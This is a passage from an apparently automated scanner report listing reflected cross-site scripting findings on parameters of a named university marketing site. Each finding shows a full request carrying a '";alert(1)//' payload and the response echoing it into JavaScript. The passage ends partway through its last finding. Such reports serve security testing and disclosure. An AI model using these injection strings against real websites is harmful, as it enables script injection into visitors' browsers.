
Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562"%3balert(1)//f7e8dbd9af9&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:50:22 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135048533.5; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:29 GMT; Path=/
Set-Cookie: vid=51922201; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:29 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:29 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:29 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562";alert(1)//f7e8dbd9af9&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect href
    * 2 - has popped up
...[SNIP]...

5.194. http://www.aptm.phoenix.edu/ [initiative parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the initiative request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a6c"%3balert(1)//51687862cc2 was submitted in the initiative parameter. This input was echoed as 35a6c";alert(1)//51687862cc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen35a6c"%3balert(1)//51687862cc2&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:02 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48598; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134479279.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:09 GMT; Path=/
Set-Cookie: vid=51921989; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:09 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:09 GMT; Path=/
Set-Cookie: plid=48598; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:09 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
e=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen35a6c";alert(1)//51687862cc2&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
   
       setAllowDestU
...[SNIP]...

5.195. http://www.aptm.phoenix.edu/ [keyword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bc8"%3balert(1)//cf689d3bc25 was submitted in the keyword parameter. This input was echoed as b5bc8";alert(1)//cf689d3bc25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006b5bc8"%3balert(1)//cf689d3bc25&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:47:52 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135064104.4; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:59 GMT; Path=/
Set-Cookie: vid=51921805; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:59 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:59 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:59 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44302

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
Net/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006b5bc8";alert(1)//cf689d3bc25&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2
...[SNIP]...

5.196. http://www.aptm.phoenix.edu/ [mktg_prog parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the mktg_prog request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fe23"%3balert(1)//02c8aa1a94a was submitted in the mktg_prog parameter. This input was echoed as 5fe23";alert(1)//02c8aa1a94a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen5fe23"%3balert(1)//02c8aa1a94a&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:18 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135064136.4; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:25 GMT; Path=/
Set-Cookie: vid=51922023; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:25 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:25 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:25 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
e=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen5fe23";alert(1)//02c8aa1a94a&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
   
       setAllowDestURLOnSubmit(true)
...[SNIP]...

5.197. http://www.aptm.phoenix.edu/ [provider parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the provider request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0f7a"%3balert(1)//300fb6cc037 was submitted in the provider parameter. This input was echoed as a0f7a";alert(1)//300fb6cc037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSNa0f7a"%3balert(1)//300fb6cc037&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:47:35 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134478903.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:42 GMT; Path=/
Set-Cookie: vid=51921769; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:42 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:42 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:42 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44232

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSNa0f7a";alert(1)//300fb6cc037&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602
...[SNIP]...

5.198. http://www.aptm.phoenix.edu/ [pvp_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the pvp_campaign request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 937af"%3balert(1)//10c054b4a93 was submitted in the pvp_campaign parameter. This input was echoed as 937af";alert(1)//10c054b4a93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95937af"%3balert(1)//10c054b4a93&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:51:56 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134479413.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:06:03 GMT; Path=/
Set-Cookie: vid=51907359; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:06:03 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:06:03 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:06:03 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44199

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95937af";alert(1)//10c054b4a93&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&desti
...[SNIP]...

5.199. http://www.aptm.phoenix.edu/ [unit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the unit request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4b9"%3balert(1)//0a352431f30 was submitted in the unit parameter. This input was echoed as be4b9";alert(1)//0a352431f30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dirbe4b9"%3balert(1)//0a352431f30&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:48:32 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809646.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:39 GMT; Path=/
Set-Cookie: vid=51921913; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:39 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:39 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:39 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44232

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
&postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dirbe4b9";alert(1)//0a352431f30&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&
...[SNIP]...

5.200. http://www.aptm.phoenix.edu/ [user1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the user1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0112"%3balert(1)//a96fd83d2c4 was submitted in the user1 parameter. This input was echoed as f0112";alert(1)//a96fd83d2c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112"%3balert(1)//a96fd83d2c4&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:50:51 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134479311.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:58 GMT; Path=/
Set-Cookie: vid=51922259; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:58 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:58 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:58 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44232

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
redit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112";alert(1)//a96fd83d2c4&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602D1FF1E5348");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect href
    * 2 - has p
...[SNIP]...

5.201. http://www.aptm.phoenix.edu/ [user2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the user2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6d2a"%3balert(1)//193f4f335e was submitted in the user2 parameter. This input was echoed as b6d2a";alert(1)//193f4f335e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

